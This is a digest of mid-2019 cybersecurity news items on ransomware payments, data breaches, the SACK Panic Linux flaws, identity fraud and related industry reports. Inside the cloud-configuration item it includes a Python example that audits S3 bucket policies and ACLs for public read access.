DCMS Pushes Porn Age Verification Deadline Back “Indefinitely”

The planned age verification scheme, which would have prevented access to pornographic material to anyone who was unable to prove their age, is to be delayed indefinitely.

According to Sky News, Department for Digital, Culture, Media and Sport (DCMS) Secretary Jeremy Wright is expected to announce the delay later today. The verification system was due to come into force on July 15, with website visitors expected to prove their age and identity by uploading scans of passports or driving licenses, or by using age-verification cards sold by newsagents.

Privacy lobbyists the Open Rights Group said “that the scheme provides little assurance to the 20 million adults that are estimated to watch porn in the UK”, calling it a “privacy timebomb” because it would lead to a central database of identities that would need to be maintained.

The Open Rights Group also said that as the standard was voluntary, there was no obligation for age verification providers to apply it, and no penalties for those verifiers who sign up to the standard and fail to meet its requirements.

Its executive director Jim Killock said: “While it’s very embarrassing to delay age verification for the third time, this is an opportunity for the Government to address the many problems that this ill-thought through policy poses.

“Age verification providers have warned that they are not ready; the BBFC’s standard to protect data has been shown to be ineffective. The Government needs to use this delay to introduce legislation that will ensure the privacy and security of online users is protected.”

Mishcon de Reya's Cyber Intelligence director Mark Tibbs said that while this seems a good idea on the face of it, introducing a “porn block” based on age verification is likely to have a number of unintended consequences which could create more problems than it solves.

“If the Ashley Madison hack taught us anything, it's that a company which holds personal information about millions of users' sex lives will be a prime target for hackers and extortionists, regardless of how good security is,” he said.

“Underage porn seekers and even adults not wanting to give over their personal information are likely to quickly find services to hide their true identities and bypass the controls. It will possibly even drive determined porn seekers onto alternative platforms such as the dark web, which are harder for governments to regulate, and may be more likely to expose users to illegal content. It may even stimulate an illicit black market of stolen accounts and identities, giving budding hackers even more reason to steal online identities.”

Infosecurity was joined by Jim Killock and psychotherapist Ronete Cohen for a discussion around the ethics of the age verification scheme during our last Online Summit.

Florida City Pays $600K to Ransomware Authors

A Florida city has agreed to pay cyber-criminals $600,000 to regain access to computer systems encrypted with ransomware, highlighting the continued threat to organizations from extortion-based attacks.

The Riviera Beach City Council voted unanimously to pay off the hackers, after security consultants hired to help recommended the extreme course of action, which runs counter to advice from law enforcement.

The council had already voted to spend $900,000 on new computers after the attack struck three weeks ago, bringing the total outlay for the city of 32,000 residents to $1.5m.

The attack appears to have begun with a classic phishing email which a city employee clicked on. According to AP, the unnamed ransomware variant crippled email systems, forced city employees and suppliers to be paid by cheque, and even interfered with 911 dispatches.

The incident is just the latest in a long line of successful ransomware attacks targeting US cities. Most recently, Baltimore suffered major outages which are said to be costing the city $18m. Another ransomware blitz forced employees in Del Rio back to pen and paper.

However, both of those cities refused to pay the ransom. Paying up is generally discouraged by law enforcers as there’s no guarantee that victims will regain access to their data and it means they may be singled out as easy targets in future raids.

According to the FBI, there were just 1493 reported victims of ransomware last year with attacks costing them a little over $3.6m. However, these figures are likely to be a significant under-estimate, given many attacks won’t be reported and the figure for losses doesn’t include “lost business, time, wages, files, equipment, or any third party remediation services acquired by a victim.”

Cyber-criminals appear to be focusing their efforts increasingly on businesses. The number of ransomware detections targeting consumers dropped 10% quarter-on-quarter in Q1, whereas attacks against corporates surged 195%, according to Malwarebytes.

UK Identity Fraud Jumps 8% to New All-Time High

Identity fraud rose by 8% in the UK last year to hit an all-time high, with both the very young and old experiencing the biggest increases, according to Cifas.

The anti-fraud non-profit’s latest Fraudscape report for 2018 was compiled as always from the 350 organizations that submit data to its National Fraud Database.

These members recorded nearly 324,000 cases of fraud overall last year, a return to the highs of 2015 and 2016 after a dip in 2017.

The number of over-60s suffering identity fraud shot up 34% over the previous year, while the number of under-21s experiencing impersonation attacks jumped by 26%.

Online use was blamed for a large part of the rise, especially for the elderly, more of whom are using the internet at home, the report claimed. Younger victims’ large social media presence also exposes them to the risk of scams, it said.

There was a 41% rise in scams targeting plastic cards: again, older members of society are increasingly being targeted here as they’re perceived to be more likely to be approved for credit, Cifas said.

The report also detailed another sharp rise in the fraudulent use of bank accounts. The volume of cases jumped 26%, indicating a rise in money mule activity.

Often, the proceeds being laundered through these accounts come from authorized push payment (APP) scams, an increasingly popular fraud tactic in which the victim is tricked into sending money to the scammer or a third party under their control.

Incidents of APP shot up 90% between 2017 and 2018, costing victims an estimated £354m, according to UK Finance.

The largest number of money mules are in the age group 21-30, followed by under-21s, although all age ranges showed an increase in activity, Cifas found.

CISOs Struggling With 50+ Separate Security Tools

Organizations are struggling to gain real-time visibility into their security technologies and suffering from an excessive number of tools running across the enterprise, according to new research from Panaseer.

The security monitoring firm polled 200 enterprise CISOs to better understand their key strategic challenges, as part of its first Security Leader’s Peer Report.

It revealed that 87% are struggling to gain any meaningful insight into trusted data, while a sizeable minority (31%) are concerned this may impact their ability to comply with key regulations.

Complex, siloed IT systems are compounding these challenges, the report found.

On average, responding organizations are running 57 separate security tools. Over a quarter (27%) claimed to be running a staggering 76+ discrete security products.

These aren’t necessarily making the organization any safer – in fact, they may be working to do the opposite. Over 70% of respondents admitted that they don’t even evaluate their security tools based on how effectively they reduce cyber risk.

The result is that enterprises are often flying blind when it comes to security, with security teams forced to spend much of their valuable time producing reports manually. This was cited by over a third (36%) of respondents.

The administrative burden of formatting and presenting data, working with spreadsheets and compiling data for regulators and the board is an overhead that stretched security teams can ill afford, according to Panaseer CTO Charaka Goonatilake.

“Instead of deploying scarce cyber-experts to improve security in the business, they’re wasting their talents on manually constructing reports in an attempt to provide visibility into security posture,” he told Infosecurity.

He argued that automation is an opportunity to accelerate decision making, reduce error and enhance visibility.

“Automating the end-to-end process of creating a complete, accurate and up-to-date view of an organization's security posture on a daily basis requires collection, cleansing and analysis of data from dozens of sources followed by formatting and presenting the generated insights,” Goonatilake added.

“Manual reports are so prone to error, as they can only give a single snapshot in time and are then out of date almost immediately.”

Millions Fall Victim to System Cleaner Hoaxes

The first half of 2019 has seen a spike in the number of PC users attacked with fake system cleaners, according to research from Kaspersky.

The research shows that the number of users attacked jumped to 1,456,219 in the first half of 2019, compared to just 747,322 for the same period in 2018.

“We’ve been watching how the phenomenon of hoax cleaners has been growing for the last couple of years, and it is a curious threat. On the one hand, many samples that we have seen are spreading more widely and becoming more dangerous, evolving from a simple ‘fraudulent’ scheme into fully functioning and dangerous malware,” said Artemy Ovchinnikov, security researcher at Kaspersky, in a press release.

“On the other hand, they are so widespread and seemingly innocent, that it is much easier for them to trick users into paying for a service rather than frightening them with screen blockers and other unpleasant malware. However, these two ways end up [with] the same results with users losing their money.”

With many users complaining of slow computers and crash errors, malicious actors have taken to offering specious solutions, though the programs that are supposed to scrub the computer clean are really just hoaxes.

These types of hoaxes are difficult for the average user to detect given that there are many legitimate tools that do actually solve such issues. However, researchers are seeing more of these fraudulent programs designed to trick users into paying for alleged computer issues to be fixed.

Cyber-criminals are exploiting users’ inexperience, tricking them into installing the hoax cleaners, which are really just disguises for malware such as Trojans or ransomware, according to Ovchinnikov.

Though these hoaxes can be distributed through scams or dubious websites, “Hoax developers’ target audience is inexperienced home users not very familiar with device operating systems or concerned about ‘taking out the trash’ and updating the system,” Ovchinnikov wrote.

“Our statistics show that the most popular target country for Hoax creators and distributors is Japan, where in recent years one in eight users has encountered it. Japan is followed by Germany and, surprisingly, Belarus. Italy and Brazil round out the top five.”

Security Should Be Business Focused, Says ISF

A security assurance program that focuses on business needs can help organizations meet the needs of business stakeholders, according to a new report released by Information Security Forum (ISF).

The report, Establishing a Business-Focused Security Assurance Program, offers organizations ways to establish a security assurance program that takes a business-focused approach by “identifying how to move from current to future approaches, introducing three fundamental elements that underpin successful business-focused security assurance and describing a repeatable process to provide security assurance.”

Given that implementations of security assurance programs vary significantly among businesses, the report is an effort to formalize the structure through four strategic objectives:

  • Identifying the specific needs of different business stakeholders

  • Testing and verifying the effectiveness of controls, rather than focusing purely on whether the right ones are in place

  • Reporting on security in a business context

  • Leveraging skills, expertise and technology from within and outside the organization

“Taking a business-focused approach to security assurance is an evolution. It means going a step further and demonstrating how well business processes, projects and supporting assets are really protected by focusing on how effective controls are,” said Steve Durbin, managing director, ISF, in today’s press release.

“A business-focused approach requires a broader view, considering the needs of multiple stakeholders within the organization: what do they need to know, when and why? Answering these questions will enable adoption of testing, measurement and reporting techniques that provide appropriate evidence.”

“In today’s fast-moving business environment, filled with constantly evolving cyber-threats, business leaders want confidence that their processes, projects and supporting assets are well protected. An independent and objective security assurance function should provide business stakeholders with the right level of confidence in controls – complacency can have disastrous consequences,” continued Durbin.

“Establishing a business-focused security assurance program is a long-term and ongoing investment. The ISF approach presented in this report will help organizations to review current approaches and determine how to turn aspirations into reality.”

SACK Panic Vulnerability in Linux

Researchers at Netflix have discovered new denial-of-service (DoS) vulnerabilities in the Linux and FreeBSD kernels, including a severe vulnerability called SACK Panic that could allow malicious actors to remotely crash servers and disrupt communications, according to an advisory published in the company’s GitHub repository.

“The vulnerabilities specifically relate to the Maximum Segment Size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. The most serious, dubbed ‘SACK Panic,’ allows a remotely-triggered kernel panic on recent Linux kernels,” the advisory stated.

Netflix researchers added that there are patches for most of these vulnerabilities and additional mitigation strategies to consider if patching is not possible.

“The issues have been assigned multiple CVEs: CVE-2019-11477 is considered an Important severity, whereas CVE-2019-11478 and CVE-2019-11479 are considered a Moderate severity,” a Red Hat advisory stated.

These flaws can reportedly impact any organization running large fleets of production Linux computers and, if left unpatched, allow remote attackers to take control and crash the machines.

“The Linux TCP SACK vulnerability is a truly serious threat. First, this is a threat to many Internet-facing servers of the big giants of the internet (Google, Amazon, etc.) – and right now the focus is on upgrading the endless servers that are used as the infrastructure for the internet and the countless applications that rely on them,” said Armis’ VP of research, Ben Seri.

“Once the dust settles and the majority of this infrastructure has received the proper patch, many organizations will then need to deal with the long tail of the patching cycle. At the very end of this tail are the devices that don't receive automatic updates and might not receive any update at all – the [internet of things] and unmanaged devices that in many cases are built on top of Linux. This vulnerability also goes back a long time (since Linux v2.6.29, that was released 10 years ago), so the amount of legacy devices that use the vulnerable code will be very significant in this case, and these types of devices are unlikely to receive patches at all.”

Hackers Gobble Up Data From EatStreet Diners and Partners

Online food ordering service EatStreet has revealed a major data breach affecting customers and restaurant partners.

Although the number of companies and individuals affected isn’t known, the firm claims to partner with over 15,000 restaurants in hundreds of US cities, so the figure could theoretically surge into the millions.

The two-week incident happened in May, when an “unauthorized third party was able to acquire information in our database,” according to letters sent to EatStreet’s customers, delivery partners and restaurants.

For the latter two, the information stolen may have included names, phone numbers and email addresses, plus bank account information.

However, for customers of the service, things look even worse, with the hacker potentially making off with credit card number, expiry date, CV2 number, billing and email address, name and phone number. That’s more than enough information to commit a serious range of identity fraud and to launch follow-on phishing attacks.

EatStreet claimed to have responded quickly to the incident, and said it has “reinforced” multi-factor authentication, rotated credential keys and reviewed and updated its coding practices to improve security going forward.

Interestingly, the firm’s website was also down at the time of writing.

“The case of the Eatstreet breach is a doomsday scenario for the average consumer where a service was used for convenience or necessity, and ended up causing a major threat to the consumer's interests,” argued Colin Little, senior threat analyst at Centripetal Networks.

“With the number of mobile or cloud-based consumer services a person leverages day-to-day, and the two-week time-to-detect for complete access to a database that contains some of the most sensitive PII, this event shows that consumers deserve organizations who will proactively hunt for threats to minimize the risk to consumer data.” 

AMCA Files for Bankruptcy Protection After Breach

The parent company of healthcare debt collection firm American Medical Collection Agency (AMCA) has filed for bankruptcy protection following a major breach which is thought to have affected as many as 20 million patients.

Its Chapter 11 filing in the Southern District of New York reveals the action was taken due to a “cascade of events” and “enormous expenses that were beyond the ability of the debtor to bear.”

These were precipitated by that eight-month breach, discovered in March this year, which affected millions of patients of clients including Quest Diagnostics, LabCorp and BioReference. These were customers of the medical testing firms who owed them money.

Data stolen by the hackers included payment card details, bank account information, personally identifiable information (PII) and lab test details, according to reports.

Russell Fuchs, CEO of parent company Retrieval-Masters Creditors Bureau, lent AMCA $2.5m to help pay for a mass mailing effort of breach notifications for users which is said to have cost $3.8m. Some $400,000 was apparently spent on IT services to help with the remediation and investigation of the incident.

The news of a debt collection business being short of cash will fill few neutral observers with sadness.

However, the breach itself threatens to plunge those debtors whose details were stolen into a nightmare of phishing attempts, identity theft and possible damage to their credit ratings.

That’s probably why lawmakers have stepped in. Democrat Senators Bob Menendez, Cory Booker, and Mark Warner wrote to Quest Diagnostics asking about the incident, which affected nearly 12 million of its patients.

“While I am heartened to learn that no evidence currently suggests Quest Diagnostic’s systems were breached, I am concerned about your supply chain management, and your third-party selection and monitoring process,” said Warner in his letter.

Only Quarter of IaaS Users Can Audit Config Settings

Most global organizations benefit from better security in the cloud than on-premise, with some key exceptions, including data loss prevention and configuration settings, according to McAfee.

The security giant polled 1000 enterprises around the world and combined its findings with threat data gleaned from its products to compile the Cloud Adoption and Risk Report.

The vast majority (87%) said they “experience business acceleration” through their use of cloud services.

However, while 52% benefit from improved security versus on-premise, and just 10% of data is hidden in shadow IT environments, there were caveats.

Only 36% of respondents said they could enforce DLP in the cloud, and just a third said they could control collaboration settings to determine how data is shared. Perhaps even more worryingly, only a quarter (26%) of IaaS users said they could audit configuration settings.

Misconfigured cloud infrastructure is an increasing problem: according to the report, over 1/20 of Amazon S3 buckets in use are misconfigured to be publicly readable. In fact, it found that enterprises are under-estimating the number of services they use by more than 6000%.

John Noakes, cloud specialist at IT solutions firm Insight UK, argued that this cloud sprawl should be cause for “major alarm.”

“To have any hope of controlling risk, organizations need to understand the risks they face, and take firm control of their cloud environments. This means having rigorous controls in place to govern how cloud services are purchased and managed, so that IT is not left unaware of the potential scale of any problem,” he added.

“It means following best practice with commissioning and configuring cloud infrastructure, so that data is not left wide open to the public. Part of the problem is that legacy tools, skills and processes aren’t fit for the cloud era, yet many organizations haven’t adapted. As a result, they continue to leave themselves wide open to unnecessary risk.”
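One way to audit the two documents that can make an S3 bucket publicly readable, the bucket policy and the bucket ACL, as an added example (not code from McAfee’s report or any vendor tool); the sample policy and ACL documents are constructed in the documented AWS shapes, and the function names are my own:

```python
import json

# Added example, not from the McAfee report or any vendor tool. It inspects the
# two documents that make an S3 bucket publicly readable: the bucket policy and
# the bucket ACL. Inputs are constructed samples in the documented AWS shapes;
# no AWS API is called. Caveat: S3 Block Public Access settings at the account
# or bucket level can override both documents, so audit those as well.

# Actions that expose object data or object listings.
READ_ACTIONS = {"s3:getobject", "s3:getobjectversion", "s3:listbucket"}
# Predefined ACL group URIs meaning "everyone" and "any AWS account holder".
PUBLIC_GRANTEE_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

def _as_list(value):
    """Policy fields may be a single string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def _principal_is_public(principal):
    """True for Principal "*" or {"AWS": "*"} (or a list containing "*")."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False

def _action_grants_read(action):
    """Match one Action entry, including wildcards such as s3:* or s3:Get*."""
    action = action.lower()
    if action in ("*", "s3:*"):
        return True
    if action.endswith("*"):
        return any(a.startswith(action[:-1]) for a in READ_ACTIONS)
    return action in READ_ACTIONS

def public_read_statements(policy):
    """Return Sids of Allow statements that let anyone read the bucket.

    Flagged when Effect is Allow, the Principal is public, an Action grants read
    and there is no Condition. Conditioned grants (e.g. aws:SourceIp) are not
    unconditionally public, so they are left for manual review, not flagged."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    flagged = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        if not _principal_is_public(stmt.get("Principal")):
            continue
        if any(_action_grants_read(a) for a in _as_list(stmt.get("Action"))):
            flagged.append(stmt.get("Sid", f"statement[{idx}]"))
    return flagged

def public_acl_grants(acl):
    """Return (grantee URI, permission) pairs in an ACL that expose the bucket.
    `acl` mirrors the GetBucketAcl response shape. READ on a bucket lists its
    objects; FULL_CONTROL includes READ."""
    exposed = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GRANTEE_URIS:
            if grant.get("Permission") in ("READ", "FULL_CONTROL"):
                exposed.append((grantee["URI"], grant["Permission"]))
    return exposed

def is_publicly_readable(policy, acl):
    """One verdict for the bucket: True if either document opens it up."""
    return bool(public_read_statements(policy)) or bool(public_acl_grants(acl))

# Constructed sample documents (not taken from any real account).
PUBLIC_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicReadGetObject", "Effect": "Allow",
                   "Principal": "*", "Action": ["s3:GetObject"],
                   "Resource": "arn:aws:s3:::example-bucket/*"}],
})
SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "CorpNetworkOnly", "Effect": "Allow",
                   "Principal": {"AWS": "*"}, "Action": "s3:Get*",
                   "Resource": "arn:aws:s3:::example-bucket/*",
                   "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}}],
})
PRIVATE_ACL = {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
                           "Permission": "FULL_CONTROL"}]}
OPEN_ACL = {"Grants": PRIVATE_ACL["Grants"] + [
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"}]}

if __name__ == "__main__":
    print("public policy flags:", public_read_statements(PUBLIC_POLICY))
    print("scoped policy flags:", public_read_statements(SCOPED_POLICY))
    print("open ACL grants:", public_acl_grants(OPEN_ACL))
    print("bucket publicly readable?", is_publicly_readable(PUBLIC_POLICY, PRIVATE_ACL))
```

Feeding the output of GetBucketPolicy and GetBucketAcl for every bucket in an account into these two functions gives the kind of configuration audit the report says only a quarter of IaaS users can perform.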

Facebook Announces Digital Wallet and Coin, Libra

Even as it potentially faces billions of dollars in fines from the US Federal Trade Commission (FTC), Facebook today announced its plans for Calibra, a Facebook subsidiary that will provide financial services and enable users to access and participate in the Libra network.

“Calibra will let you send Libra to almost anyone with a smartphone, as easily and instantly as you might send a text message and at low to no cost. And, in time, we hope to offer additional services for people and businesses, like paying bills with the push of a button, buying a cup of coffee with the scan of a code or riding your local public transit without needing to carry cash or a metro pass,” the news release stated.

Intended to be officially released in 2020, the digital currency is powered by blockchain technology. However, not all responses to the news have been positive. The cryptocurrency is “a glorified exchange traded fund which uses blockchain buzzwords to neutralize the regulatory impact of coming to market without a licence as well as to veil the disproportionate influence of Facebook in what it hopes will eventually become a global digital reserve system,” according to the Financial Times.

While some remain wary, given Facebook’s recent track record of failing to protect consumer data, the company added that “Calibra will have strong protections in place to keep your money and your information safe. We’ll be using all the same verification and anti-fraud processes that banks and credit cards use, and we’ll have automated systems that will proactively monitor activity to detect and prevent fraudulent behavior.”

The idea that social and financial data could be combined is worrying, said Ray Walsh, digital privacy expert at ProPrivacy.

“Although Facebook claims that it will keep the distinct data sets at arm's length – it is hard to believe that consumer habits will not be tracked in order to allow Facebook to better serve ads. After all, that is how the firm produces the majority of its revenue streams.

“Facebook has proven, time and time again, that it is not to be trusted with consumer data, and it seems unlikely that it does not plan to exploit as much consumer data as it is legally permitted to do so. Facebook's whitepaper claims that it will not source transaction data from the Libra Blockchain without consumer consent. For the time being, no privacy policies or Terms of Service are available for Libra coin.”

Accenture Acquires Deja vu Security

Deja vu Security has become a part of Accenture’s cyber-defense offerings through an acquisition announced on June 17.

The Seattle-based Deja vu Security was founded in 2011 and has been providing a range of business application security solutions with a focus on integrating security into the product development lifecycle. Accenture continues to invest in next-generation cybersecurity solutions that will deliver end-to-end security for clients’ business. Financial terms of the agreement were not disclosed.

“Deja vu Security brings to Accenture a deep expertise in the techniques, tools and methods for securing connected devices and IoT networks,” the press release said. The transaction heightens Accenture’s ability to improve the “security of things.”

“For technology companies, third-party suppliers and consumers alike, IoT security controls often remain an afterthought which is why it’s critical that security is built in from the start for any new products, processes or services,” said Kelly Bissell, senior managing director of Accenture Security. “Deja vu Security’s team of innovative specialists brings considerable technical cybersecurity skills, making them a strong strategic fit and [helping] our clients reduce the risk of their connected solutions. We are very excited to welcome the Deja vu Security team to Accenture.”

Deja vu Security and its employees are reportedly excited about the transaction, according to the press release. “Accenture’s people-focused culture and innovative mindset are core values that both companies share, and our unique capabilities complement each other perfectly. We are thrilled to be joining such a high-caliber global organization,” said Adam Cecchetti, Deja vu Security’s chief executive officer.

DNS Attacks Grow More Frequent and Costly

Domain Name System (DNS) attacks have grown in frequency and cost, according to multiple research reports published this week.

The Domain Fraud Threats Report from Proofpoint found that Chengdu West Dimension Digital, NameSilo, Public Domain Registry and GoDaddy are the registrars with the most fraudulent domains. Of the millions of fraudulent domains registered, one in four has a security certificate and more than 90% remain active on a live server. In addition, more than 15% have mail exchanger (MX) records.

“Fraudulent domains 'hide in plain sight' by using many of the same top-level domains (TLDs), registrars, and web servers as legitimate domains. For example, 52% of all new domain registrations in 2018 used the .com TLD. The TLD was similarly popular with fraudsters: nearly 40% of new fraudulent domain registrations used .com,” Proofpoint’s Ali Mesdaq wrote in a June 17 blog post.

In related news, IDC’s 2019 Global DNS Threat Report, commissioned by Efficient IP, found that DNS attacks cost an average of $1.07 million for organizations, a jump of 49% from last year.

While many organizations have faced a 34% increase in DNS attacks since 2018, more than 85% of top retail brands found domains selling counterfeit versions of their products and 63% of organizations suffered application downtime. The report also found that 45% of organizations had their websites compromised, and 27% experienced business downtime.

“One in five businesses lost over $1 million per attack, causing app downtime for 63% of those attacked,” a June 18 press release said. The study also highlighted the changing popularity of attack types, which reflect a shift from volumetric to low-signal attacks, including phishing, malware-based attacks and old-school distributed denial of service (DDoS).

“With an average cost of $1m per attack and a constant rise in frequency, organizations just cannot afford to ignore DNS security and need to implement it as an integral part of the strategic functional area of their security posture to protect their data and services,” said Romain Fouchereau, research manager, European security, at IDC.

#OktaForum: Biometrics Are Authentication Preference, Privacy Concerns Remain

Biometrics are seen as a positive step forward in authentication, but employees maintain privacy concerns.

Based on a survey of 4013 workers across the UK, France and the Netherlands, the Okta Passwordless Future Report found that 78% of respondents use an insecure method to help them remember their password, including using the same passwords for multiple accounts (34%), writing passwords down (26%), typing passwords on a phone or computer (17%) and using well-known passwords (6%).

Dr Maria Bada, research associate at Cambridge University, said: “Passwords are often quite revealing. They are created on the spot, so users might choose something that readily comes to mind or something with emotional significance.

“Passwords tap into things that are just below the surface of consciousness. Criminals take advantage of this and with a little research they can easily guess a password.”

The research also found that 70% of respondents believe biometrics would benefit the workplace, but 86% have some reservations about sharing biometrics with employers. 

Todd McKinnon, CEO and co-founder of Okta, said: “Passwords have failed us as an authentication factor, and enterprises need to move beyond our reliance on this ineffective method.”

Speaking to Infosecurity, McKinnon said that Okta sees the role of biometrics as the “last mile”: the value it provides is at the policy layer, and you need to determine what your policy is.

“There is still a bunch of work that has to happen to map that, and to have access to a certain server or application, so I envisage that there will be different levels that are high or low risk,” he added.

McKinnon pointed to the need for a central policy to link all of the biometric access data together for the appropriate scenario. He said that Okta provides the technology to enable access, but it is up to the customer to determine how they enable access, whether it is via a personal phone or a corporate device, “based on the resources you are trying to access.”

On the issue of trusting employees, McKinnon said that there are too many bad user experience cases where a person cannot get a text on a personal phone, or too much data is collected due to privacy issues “because the policy is not flexible and the company does not have the right resource to check, so they over-collect information.”

Dr Bada said: “Biometric technology can be promising in creating a passwordless future, but it's essential to create an environment of trust, while ensuring privacy and personal data protection.”

#OktaForum: Trust is Key to Identity and Security

Trust remains the most important factor in enabling security and identity management.

Speaking at the Okta Forum in London, Okta CEO Todd McKinnon said that every company is a technology company now, and if you are not a technology company “your replacement will be a technology company.”

McKinnon explained that technology comes with risks: the “war on talent” is making it hard to find the right people, “unprecedented regulations” like GDPR are bringing new frameworks to companies that preceded the technology revolution, and social networking has led people to be concerned about trust and privacy.

“There is a tremendous potential of technology, but it is not without issues and risks and can lead to the erosion of trust,” he said. “At Okta, we believe that the potential of technology is amazing, but a lack of trust won’t enable us to reach its potential, so we need to trust the new frontier as we’re all technology companies.”

McKinnon said that there is a “burden to be secure” and for Okta the solution is that identity is key. “Connect people to technology and get identity right and solve the trust problem,” he advised.

He went on to say that the use of any technology is not about identity or security, “but to push for you to be successful,” and that to enable this, Okta built the Okta Identity Cloud.

McKinnon said that the company was focused on building the best products, having a comprehensive set of integrations, supporting use cases and building up data “to help you do the right actions in your environment.”

Speaking to Infosecurity, McKinnon explained that after the revolution of technology companies, the “backlash against technology” and the impact on privacy had “evened up the ante as companies need to get identity right.”

White Hats Update GandCrab Decryptor to Hasten its End

Infamous ransomware GandCrab could finally be on the way out, after white hats released yet another updated decryptor tool designed to help victims to get their data back.

In partnership with various law enforcement agencies including Europol, the Metropolitan Police, the FBI and NCA, Bitdefender has released the latest in a string of tools which it claimed has saved tens of thousands of organizations $50m in unpaid ransom money.

This effectively neutralizes every version of the ransomware-as-a-service offering up to and including the latest, v5.2. It can be downloaded from the No More Ransom project.

Although the ransomware rose to claim a 50% market share in August 2018, these efforts have done much to limit its appeal on the cybercrime underground.

“The three decryptors released in collaboration with partner law enforcement agencies – and particularly the GandCrab decryptor for version 5.1 – compelled GandCrab affiliates to shrink their business to avoid unnecessary costs,” claimed Bitdefender senior threat analyst, Bogdan Botezatu.

“For instance, in February 2019, after the release of the decryptor for version 5.1, affiliates kept pushing decryptable versions of the malware for more than a week, allowing fresh victims to decrypt their data for free. As of March 2019, GandCrab’s market share has shrunk back to 30%, with almost one in three infections tied to the group.”

GandCrab differs from many of its counterparts in that it’s offered via an affiliate model: distributors effectively purchase a license to spread the malware, keeping most of the profits themselves but sharing 40% with the original developers.

It’s a model that has served those ransomware authors well: a few weeks ago they published a statement claiming to have generated $2bn from their endeavors over the past year, personally netting $150m.

In the same note they claimed to be retiring, and stopped distribution partners from accessing the latest version of the ransomware.

This could spell the end for GandCrab, but it won’t be the end of the ransomware threat for businesses.

Botezatu claimed his firm sees 12 new ransomware strains each month, of which only around 10% are decryptable.

Oregon State Uni Attack Exposes Data on Hundreds

Another US university has been hit by a successful cyber-attack, this time potentially compromising personally identifiable information (PII) on hundreds of students and family members.

Oregon State University (OSU) issued a public notice on Friday after one of its employees’ email accounts was hacked last month and used to spam others with phishing emails.

Forensic investigators found several documents in the breached inbox which contained the PII of 636 students and their relatives, a statement from the university noted.

“OSU is continuing to investigate this matter and determine whether the cyber-attacker viewed or copied these documents with personal information,” said Steve Clark, the university’s vice-president for university relations and marketing.

“While we have no indication at this time that the personal information was seen or used, OSU has notified these students and family members of this incident. And we have offered information about support services that are available, including 12 months of credit monitoring services that the university will enable at no cost.”

Andrew Clarke, EMEA director at One Identity, argued the incident shows that people remain the “first and last line of cyber-defense.”

“Creating a framework for identifying, authenticating, and authorizing correct access for sensitive information and ensuring that it is implemented across the entire organization can help protect information pertaining to individuals, which is the most critical type of data held by many institutions,” he added.

“PII such as social security numbers, names and physical addresses, and usernames and passwords are a key target, and just one major breach of such data and there is a loss of faith in the organization and knock-on impact on the business.”

Universities are an increasingly popular target for both financially-motivated cyber-criminals and even state-sponsored hackers, who are looking for large troves of personal data on students and staff to monetize, or for sensitive IP in ground-breaking research.

Earlier this year, Georgia Tech suffered a breach of 1.3 million staff and student records after a web app vulnerability was exploited by attackers.

Trans Charity Mermaids Apologizes Over Leaked Emails

A transgender charity has apologized after journalists were able to find sensitive internal emails via a public internet search.

Mermaids UK, which supports trans children and young people, said the emails came from 2016 and 2017, when it was a smaller organization without the internal processes and access to technical support which would now prevent such incidents.

Although the original Sunday Times report which uncovered the leak said the emails included “intimate details of vulnerable youngsters” which could be found simply by typing the organization’s name and charity number in, Mermaids sought to downplay the seriousness of the incident.

“Mermaids understands that the information could not be found unless the person searching for the information was already aware that the information could be found,” it said in a statement.

“The material mainly consisted of internal information involving full and frank discussion of matters relevant to Mermaids, but unfortunately included some information identifying a small number of service users. Mermaids has contacted these people. The information, seen in its actual and proper context, is normal internal information for a group such as Mermaids.”

The emails in question, which the BBC claims number around 1100, were apparently stored in a ‘private’ user group exposed online.

As well as contacting those whose details appeared in the leaked emails, the charity has contacted privacy regulator the Information Commissioner’s Office (ICO) and the Charity Commission and said it immediately remediated the incident.

“So the overall position is that there was an inadvertent breach, which has been rapidly remedied and promptly reported to the ICO, and there is no evidence that any of this information was retrieved by anybody other than the Sunday Times and those service users contacted by the journalist in pursuit of their story,” it concluded.

The incident took place well before the GDPR was introduced, although if the ICO judges there to have been a serious risk to vulnerable individuals, it may decide to take action under the old data protection regime.

NYT: US Targets Russian Power Grid

After news broke that the US has ramped up its digital attacks on Russia, according to a New York Times article, President Trump tweeted that the story was a “virtual act of treason by a once great paper...ALSO, NOT TRUE.”

Though there are no details of the malware that was reportedly placed inside Russia’s power grid system, the NYT reported that National Security Presidential Memoranda 13, a classified document, grants the Department of Defense (DoD) the power to conduct offensive online operations without receiving presidential approval.

Specifically, General Paul Nakasone, commander of the US Cyber Command, holds the authority to make these decisions about offensive strategies. Without confirming that the DoD is taking more aggressive measures, House minority whip Steve Scalise told Meet the Press on June 16, “I'm glad the administration has been taking aggressive actions.”

“An offensive cyber-strategy is a necessary component of a larger military and diplomatic strategy against a determined US adversary like Russia. After all, let’s not forget that Russia has been targeting US utilities for several years, at least,” said Carlos Perez, R&D practice lead at TrustedSec.

“US-CERT warned just last year about Russia’s cyber-operations against multiple US utilities. We’ve also seen Russia put these capabilities to real-world effect, as in the case of the two cyber-induced power outages that affected Ukraine. We have to take this threat seriously, and having a cyber-response ready to go is of paramount importance.”

Perez clarified that the operations described by the New York Times also do not constitute cyber-war, nor do they exceed the legal restrictions set by our own government.

“The Department of Defense Law of War Manual has codified cyber operations, which this current action falls within. As you’ll notice, these guidelines include such operational objectives as reconnaissance, acquiring and securing access to key systems, and implanting access tools into infrastructure for the purpose of acquiring foreign intelligence, gaining information about an adversary’s capabilities and gathering information to determine intent, just to name a few.”

